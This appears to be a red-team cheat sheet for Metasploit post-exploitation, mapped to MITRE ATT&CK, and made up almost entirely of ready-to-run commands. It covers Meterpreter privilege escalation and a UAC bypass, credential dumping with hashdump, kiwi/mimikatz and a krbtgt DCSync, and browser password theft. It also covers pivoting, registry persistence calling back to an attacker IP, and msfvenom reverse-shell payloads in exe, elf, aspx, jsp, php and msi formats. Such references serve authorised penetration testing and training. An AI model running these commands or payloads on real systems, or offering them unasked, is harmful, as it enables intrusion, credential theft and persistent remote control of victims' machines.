Metasploit Post-Exploitation

Overview

Metasploit Framework provides extensive post-exploitation capabilities through Meterpreter sessions. This page covers Meterpreter commands, post modules for privilege escalation and enumeration, and pivoting through Metasploit. For initial exploitation, see the relevant technique pages.

ATT&CK Mapping

  • Tactics: TA0002 - Execution, TA0004 - Privilege Escalation
  • Techniques: T1059 - Command and Scripting Interpreter

Techniques

Essential Meterpreter Commands

# Metasploit Framework
# https://github.com/rapid7/metasploit-framework

# System info
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getpid

# File operations
meterpreter > upload /local/file.exe C:\\Windows\\Temp\\file.exe
meterpreter > download C:\\Windows\\Temp\\secret.txt /local/path/
meterpreter > ls
meterpreter > cd C:\\Users

# Process management
meterpreter > ps
meterpreter > migrate <pid>
meterpreter > kill <pid>

# Networking
meterpreter > ipconfig
meterpreter > netstat
meterpreter > arp
meterpreter > route

# Shell access
meterpreter > shell
meterpreter > execute -f cmd.exe -i -H

Privilege Escalation

# Try auto-escalation
meterpreter > getsystem

# Suggest local exploits
use post/multi/recon/local_exploit_suggester
set SESSION <id>
run

# Token impersonation
meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token "<DOMAIN>\\<user>"

# UAC bypass modules
use exploit/windows/local/bypassuac_fodhelper
set SESSION <id>
run

Credential Harvesting

# Dump password hashes (requires SYSTEM)
meterpreter > hashdump

# Mimikatz via Meterpreter (kiwi)
meterpreter > load kiwi
meterpreter > creds_all
meterpreter > creds_msv
meterpreter > creds_kerberos
meterpreter > kiwi_cmd "lsadump::dcsync /domain:<domain> /user:krbtgt"

# Search for credentials
use post/windows/gather/credentials/credential_collector
set SESSION <id>
run

# Dump browser passwords
use post/multi/gather/firefox_creds
use post/windows/gather/enum_chrome

Pivoting

# Add route through Meterpreter session
route add <internal_subnet>/<mask> <session_id>

# Auto-route
use post/multi/manage/autoroute
set SESSION <id>
run

# Start SOCKS proxy
use auxiliary/server/socks_proxy
set SRVPORT 1080
set VERSION 5
run -j

# Port forwarding
meterpreter > portfwd add -l 8080 -p 80 -r <internal_target>
meterpreter > portfwd list

# Reverse port forward
meterpreter > portfwd add -R -l 4444 -p 4444 -L <attacker_ip>

Post Modules — Enumeration

# Windows enumeration
use post/windows/gather/enum_logged_on_users
use post/windows/gather/enum_shares
use post/windows/gather/enum_applications
use post/windows/gather/enum_patches
use post/windows/gather/checkvm

# Linux enumeration
use post/linux/gather/enum_configs
use post/linux/gather/enum_network
use post/linux/gather/enum_users_history

# Network enumeration
use post/multi/gather/ping_sweep

Post Modules — Persistence

# Windows persistence (registry-based startup payload)
use exploit/windows/local/persistence
set SESSION <id>
set LHOST <attacker_ip>
run

Session Management

# List sessions
sessions -l

# Interact with session
sessions -i <id>

# Background current session
meterpreter > background

# Upgrade shell to Meterpreter
sessions -u <shell_session_id>

# Kill all sessions
sessions -K

Payload Generation

# Windows reverse shell
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f exe -o shell.exe

# Linux reverse shell
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f elf -o shell.elf

# Web payloads
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f aspx -o shell.aspx
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.jsp
msfvenom -p php/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f raw -o shell.php

# MSI (for AlwaysInstallElevated)
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4444 -f msi -o shell.msi

References

Official Documentation

MITRE ATT&CK